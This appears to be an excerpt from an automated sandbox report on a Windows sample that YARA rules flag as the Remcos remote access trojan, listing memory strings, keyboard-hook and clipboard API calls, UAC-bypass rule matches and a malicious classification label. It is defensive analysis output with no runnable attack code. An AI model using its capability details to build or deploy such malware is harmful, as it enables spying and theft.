                  Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: PEbZthAqV9.exe, 00000000.00000002.1834015423.0000000006DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: PEbZthAqV9.exe, myTuDsvNcebev.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to register a low level keyboard hook
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_00409340 SetWindowsHookExA 0000000D,0040932C,0000000018_2_00409340
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,18_2_0040A65A
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,18_2_00414EC1
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,18_2_0040A65A
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,18_2_00409468

                  E-Banking Fraud

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 18.2.myTuDsvNcebev.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PEbZthAqV9.exe.48f8790.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PEbZthAqV9.exe.4883170.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.2.myTuDsvNcebev.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PEbZthAqV9.exe.48f8790.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.PEbZthAqV9.exe.4883170.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000012.00000002.1910984680.000000000124B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1831199918.0000000004883000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.4179854421.0000000001257000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: PEbZthAqV9.exe PID: 7412, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: PEbZthAqV9.exe PID: 7952, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: myTuDsvNcebev.exe PID: 2312, type: MEMORYSTR

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Contains functionalty to change the wallpaper
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0041A76C SystemParametersInfoW,18_2_0041A76C

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 18.2.myTuDsvNcebev.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 18.2.myTuDsvNcebev.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 18.2.myTuDsvNcebev.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 0.2.PEbZthAqV9.exe.48f8790.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0.2.PEbZthAqV9.exe.48f8790.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0.2.PEbZthAqV9.exe.48f8790.2.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 0.2.PEbZthAqV9.exe.4883170.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0.2.PEbZthAqV9.exe.4883170.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0.2.PEbZthAqV9.exe.4883170.1.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 18.2.myTuDsvNcebev.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 18.2.myTuDsvNcebev.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 18.2.myTuDsvNcebev.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 0.2.PEbZthAqV9.exe.48f8790.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0.2.PEbZthAqV9.exe.48f8790.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0.2.PEbZthAqV9.exe.48f8790.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 0.2.PEbZthAqV9.exe.4883170.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0.2.PEbZthAqV9.exe.4883170.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 00000000.00000002.1831199918.0000000004883000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: Process Memory Space: PEbZthAqV9.exe PID: 7412, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: myTuDsvNcebev.exe PID: 2312, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,18_2_00414DB4
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeCode function: 0_2_00C1D3440_2_00C1D344
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeCode function: 0_2_02D3A1EE0_2_02D3A1EE
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeCode function: 0_2_02D3C9800_2_02D3C980
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeCode function: 0_2_02D3C6980_2_02D3C698
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeCode function: 0_2_02D3C6890_2_02D3C689
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeCode function: 0_2_02D364C80_2_02D364C8
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeCode function: 0_2_02D344440_2_02D34444
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeCode function: 0_2_02D3C9700_2_02D3C970
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeCode function: 0_2_02D3AD200_2_02D3AD20
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeCode function: 0_2_075461480_2_07546148
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeCode function: 0_2_075405590_2_07540559
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeCode function: 0_2_075405600_2_07540560
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeCode function: 0_2_075494E80_2_075494E8
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeCode function: 0_2_0754B4980_2_0754B498
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeCode function: 0_2_075461390_2_07546139
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeCode function: 0_2_075490B00_2_075490B0
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeCode function: 0_2_07549D580_2_07549D58
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeCode function: 0_2_075499200_2_07549920
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeCode function: 0_2_0AD60E350_2_0AD60E35
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 9_2_011ED3449_2_011ED344
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 9_2_0A8E04489_2_0A8E0448
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0042515218_2_00425152
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0043528618_2_00435286
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_004513D418_2_004513D4
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0045050B18_2_0045050B
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0043651018_2_00436510
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_004316FB18_2_004316FB
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0043569E18_2_0043569E
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0044370018_2_00443700
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_004257FB18_2_004257FB
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_004128E318_2_004128E3
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0042596418_2_00425964
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0041B91718_2_0041B917
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0043D9CC18_2_0043D9CC
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_00435AD318_2_00435AD3
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_00424BC318_2_00424BC3
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0043DBFB18_2_0043DBFB
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0044ABA918_2_0044ABA9
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_00433C0B18_2_00433C0B
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_00434D8A18_2_00434D8A
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0043DE2A18_2_0043DE2A
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0041CEAF18_2_0041CEAF
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_00435F0818_2_00435F08
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: String function: 00402073 appears 51 times
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: String function: 00432B90 appears 53 times
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: String function: 00432525 appears 41 times
                  Source: PEbZthAqV9.exeStatic PE information: invalid certificate
                  Source: PEbZthAqV9.exe, 00000000.00000002.1830115364.0000000002D51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs PEbZthAqV9.exe
                  Source: PEbZthAqV9.exe, 00000000.00000002.1831199918.0000000003EAC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PEbZthAqV9.exe
                  Source: PEbZthAqV9.exe, 00000000.00000002.1834812761.0000000007410000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs PEbZthAqV9.exe
                  Source: PEbZthAqV9.exe, 00000000.00000002.1834924504.0000000007452000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs PEbZthAqV9.exe
                  Source: PEbZthAqV9.exe, 00000000.00000002.1836141591.0000000007930000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PEbZthAqV9.exe
                  Source: PEbZthAqV9.exe, 00000000.00000002.1828093167.0000000000C2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PEbZthAqV9.exe
                  Source: PEbZthAqV9.exeBinary or memory string: OriginalFilenameJzWg.exe@ vs PEbZthAqV9.exe
                  Source: PEbZthAqV9.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 18.2.myTuDsvNcebev.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 18.2.myTuDsvNcebev.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 18.2.myTuDsvNcebev.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 0.2.PEbZthAqV9.exe.48f8790.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0.2.PEbZthAqV9.exe.48f8790.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0.2.PEbZthAqV9.exe.48f8790.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 0.2.PEbZthAqV9.exe.4883170.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0.2.PEbZthAqV9.exe.4883170.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0.2.PEbZthAqV9.exe.4883170.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 18.2.myTuDsvNcebev.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 18.2.myTuDsvNcebev.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 18.2.myTuDsvNcebev.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 0.2.PEbZthAqV9.exe.48f8790.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0.2.PEbZthAqV9.exe.48f8790.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0.2.PEbZthAqV9.exe.48f8790.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 0.2.PEbZthAqV9.exe.4883170.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0.2.PEbZthAqV9.exe.4883170.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 00000000.00000002.1831199918.0000000004883000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: Process Memory Space: PEbZthAqV9.exe PID: 7412, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: myTuDsvNcebev.exe PID: 2312, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: PEbZthAqV9.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: myTuDsvNcebev.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.PEbZthAqV9.exe.7410000.4.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.PEbZthAqV9.exe.3d6e790.3.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, M48djtjOx3Y73oBnFe.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, M48djtjOx3Y73oBnFe.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, M48djtjOx3Y73oBnFe.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, q09dpiu5WulYHThgxc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, M48djtjOx3Y73oBnFe.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, M48djtjOx3Y73oBnFe.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.PEbZthAqV9.exe.3f02b90.0.raw.unpack, M48djtjOx3Y73oBnFe.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.PEbZthAqV9.exe.7930000.5.raw.unpack, q09dpiu5WulYHThgxc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@27/16@1/2
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,18_2_00415C90
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0040E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,18_2_0040E2E7
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource,18_2_00419493
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,18_2_00418A00
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeFile created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeMutant created: NULL
